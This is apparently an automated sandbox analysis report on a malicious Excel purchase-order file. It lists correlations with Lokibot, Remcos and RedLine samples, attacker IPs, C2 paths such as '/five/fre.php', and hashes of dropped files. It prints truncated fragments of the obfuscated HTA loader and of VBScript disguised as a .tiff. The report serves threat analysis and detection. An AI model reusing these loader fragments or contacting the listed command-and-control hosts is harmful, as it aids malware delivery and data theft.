                                                                              EGA Information:
                                                                              • Successful, ratio: 33.3%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 12
                                                                              • Number of non-executed functions: 1
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .xls
                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                              • Attach to Office via COM
                                                                              • Active ActiveX Object
                                                                              • Active ActiveX Object
                                                                              • Scroll down
                                                                              • Close Viewer

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                              • Execution Graph export aborted for target mshta.exe, PID 3572 because there are no executed function
                                                                              • Execution Graph export aborted for target mshta.exe, PID 364 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: PO.2407010.xls

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              03:04:22API Interceptor103x Sleep call for process: mshta.exe modified
                                                                              03:04:26API Interceptor910x Sleep call for process: powershell.exe modified
                                                                              03:04:35API Interceptor15x Sleep call for process: wscript.exe modified
                                                                              03:05:05API Interceptor432x Sleep call for process: aspnet_regbrowsers.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              172.67.162.95AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    0001.xlsGet hashmaliciousRemcosBrowse
                                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                        Order-1351125X.docx.docGet hashmaliciousFormBookBrowse
                                                                                          2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                                                                                            Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                                                                              Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                                                Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                  • tuong.me/wp-login.php
                                                                                                  94.156.177.220Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220/simple/five/fre.php
                                                                                                  Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220/logs/five/fre.php
                                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220/simple/five/fre.php
                                                                                                  SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220/simple/five/fre.php
                                                                                                  Statement Of Account.exeGet hashmaliciousLokibotBrowse
                                                                                                  • 94.156.177.220/skipo/five/fre.php
                                                                                                  Purchase order.xlsGet hashmaliciousLokibotBrowse
                                                                                                  • 94.156.177.220/simple/five/fre.php
                                                                                                  Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                                  • 94.156.177.220/logs/five/fre.php
                                                                                                  1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                                  • 94.156.177.220/simple/five/fre.php
                                                                                                  SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                                                                  • 94.156.177.220/simple/five/fre.php
                                                                                                  Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                                  • 94.156.177.220/logs/five/fre.php

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  acesso.runPo docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 104.21.74.191
                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.74.191
                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.74.191
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.74.191
                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 172.67.162.95
                                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 172.67.162.95

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUS ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 188.114.97.3
                                                                                                  File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                  • 188.114.97.3
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 104.21.74.191
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                  • 188.114.96.3
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.4.26.82
                                                                                                  AS-COLOCROSSINGUSPO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 192.3.101.8
                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 198.46.178.151
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 192.3.101.8
                                                                                                  SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 172.245.26.231
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 192.3.101.8
                                                                                                  Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 192.3.220.20
                                                                                                  ORDEN7873097067.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 172.245.185.139
                                                                                                  cotizaci#U00f2n.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 192.3.220.20
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 107.175.130.36
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 107.175.130.36
                                                                                                  NET1-ASBGPo docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220
                                                                                                  Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220
                                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220
                                                                                                  SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 94.156.177.220
                                                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                  • 93.123.85.205
                                                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                  • 93.123.85.205
                                                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                  • 93.123.85.205
                                                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                  • 93.123.85.205
                                                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                  • 93.123.85.205
                                                                                                  na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                  • 93.123.85.205
                                                                                                  CLOUDFLARENETUS ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  • 188.114.97.3
                                                                                                  File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                  • 188.114.97.3
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 104.21.74.191
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.97.3
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                  • 188.114.96.3
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 1.4.26.82

                                                                                                  JA3 Fingerprints

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  05af1f5ca1b87cc9cc9b25185115607dPo docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  1.rtfGet hashmaliciousRemcosBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  swithnew.docGet hashmaliciousRemcosBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 142.250.186.46
                                                                                                  • 172.217.16.193
                                                                                                  7dcce5b76c8b17472d024758970a406bPO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191
                                                                                                  ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                  • 172.67.162.95
                                                                                                  • 104.21.74.191

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4742
                                                                                                  Entropy (8bit):4.8105940880640246
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                  MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                  SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                  SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                  SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                  Malicious:false
                                                                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithmegood[1].hta

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):173111
                                                                                                  Entropy (8bit):2.0072434219292554
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ
                                                                                                  MD5:D61EF0038DE65F697ABB0B7A21B499DB
                                                                                                  SHA1:F8FACFA18BF5EEECAA0601E8C1690FE60FE02FF8
                                                                                                  SHA-256:8762A9DEA77DB2F44207CC9EDBC192F5776F7AC8532440AE60A65F5102F8EC93
                                                                                                  SHA-512:3CE0E7E8302D6B6C23EA209B07640BE3B616306494D065C0293885BED194002F92BC41F4329F18465DD0AD77087AFA6CE5A30A585E422F08A017306040986223
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithmegood[1].hta, Author: Joe Security
                                                                                                  Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CSCrIpT%25252520lanGuAgE%2525253D%25252522VbScRiPt%25252522%2525253E%2525250AdIM%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seemethebestthingswithgreatneedswithgoodformewith[1].tiff

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):141910
                                                                                                  Entropy (8bit):3.6703425717520406
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:eirfggt5pzOGwjqSxVj51Dis9CifP9+z0xG11E6SMWxJRX:eir4gt5pKGwDzjbDislfl+nKMYJRX
                                                                                                  MD5:64CC9748329C0E186CACD10D639615E6
                                                                                                  SHA1:1291F245B185BD05FB09646B79F284D76E7DC0FF
                                                                                                  SHA-256:2C5FFFA8231F572E3A34B8D4CA675AEC062C3ACCFE661519A28E376605C0479D
                                                                                                  SHA-512:65CCBFE0223B58675AEF7DE997229F3BA66BE892C851D6CEC9018B941F3A5C5CAC3C41FBE1878474213293AD25059B06E7FF7F0C4E3320D75A6FA7F071B646BA
                                                                                                  Malicious:false
                                                                                                  Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.n.t.r.o.v.i.s.c.a.d.a.)..... . . . .d.i.m. .p.e.l.o.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .p.e.l.o.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .p.e.l.o.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E3D7593.emf

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4548484
                                                                                                  Entropy (8bit):3.5983684802509543
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:x0IivajYI2qoWfceTyPYI2qMWPXFucI1/gGoJRNRCIY5fgmom:Ia0I2qoW1ygI2qMWzIpgGoZY9gmom
                                                                                                  MD5:75F7043A255C6B9CF5293E4298ED5B1C
                                                                                                  SHA1:CB4BF68466ECDACE7C1FEDC8D01169A80381C49D
                                                                                                  SHA-256:9959002E0E67D70E08CB7A9226D1824D77FFD8CA4AB9904233B717E8EB3FEF27
                                                                                                  SHA-512:19C26274073F02E6A8E19BD7E7F5AA010EC2EA538516FD699B181F8D4CE6CA3F9AA8303E3B5C4BC5B05CDA3ED93CE1BA2E5CCAED8150803F3871E8D68B5CCFDD
                                                                                                  Malicious:false
                                                                                                  Preview:....l...........v................S...".. EMF.....gE.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA1E97D.emf

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4548484
                                                                                                  Entropy (8bit):3.5983684802509543
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:x0IivajYI2qoWfceTyPYI2qMWPXFucI1/gGoJRNRCIY5fgmom:Ia0I2qoW1ygI2qMWzIpgGoZY9gmom
                                                                                                  MD5:75F7043A255C6B9CF5293E4298ED5B1C
                                                                                                  SHA1:CB4BF68466ECDACE7C1FEDC8D01169A80381C49D
                                                                                                  SHA-256:9959002E0E67D70E08CB7A9226D1824D77FFD8CA4AB9904233B717E8EB3FEF27
                                                                                                  SHA-512:19C26274073F02E6A8E19BD7E7F5AA010EC2EA538516FD699B181F8D4CE6CA3F9AA8303E3B5C4BC5B05CDA3ED93CE1BA2E5CCAED8150803F3871E8D68B5CCFDD
                                                                                                  Malicious:false
                                                                                                  Preview:....l...........v................S...".. EMF.....gE.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                  C:\Users\user\AppData\Local\Temp\1nopa0ha.2wi.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\5p42cgk0.dxu.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\5tgzrpg4.lnr.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview:1

                                                                                                  C:\Users\user\AppData\Local\Temp\RES7224.tmp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Oct 30 07:04:30 2024, 1st section name ".debug$S"
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1328
                                                                                                  Entropy (8bit):3.9989802248859947
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:HEe9E2UjLyCFZdHkFwKdNWI+ycuZhNGakSuPNnqSqd:kjuC1EmKd41ulGa3yqSK
                                                                                                  MD5:94B1EA6CC322B8E8A9B4F50710417A1A
                                                                                                  SHA1:7217D5442F3C35ECA464FFA42F726FC07CC53A11
                                                                                                  SHA-256:FFFB3A3C6FF0504E7607F39F1487FDADBFBCFFFAABAE9D7B58B016A1BF42EF05
                                                                                                  SHA-512:3CF403F0452AF50A852F215B1E3E7C1B302366AB6C17E992E7704B782A2C3C7874A841A2953E18C24926B35C13DBE58D19CA47CF2469A15B9E541FED0AF7401A
                                                                                                  Malicious:false
                                                                                                  Preview:L...~.!g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP.................t...,h/. |.M..........4.......C:\Users\user\AppData\Local\Temp\RES7224.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.r.i.j.5.b.t.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                  C:\Users\user\AppData\Local\Temp\RESB606.tmp

                                                                                                  Download File
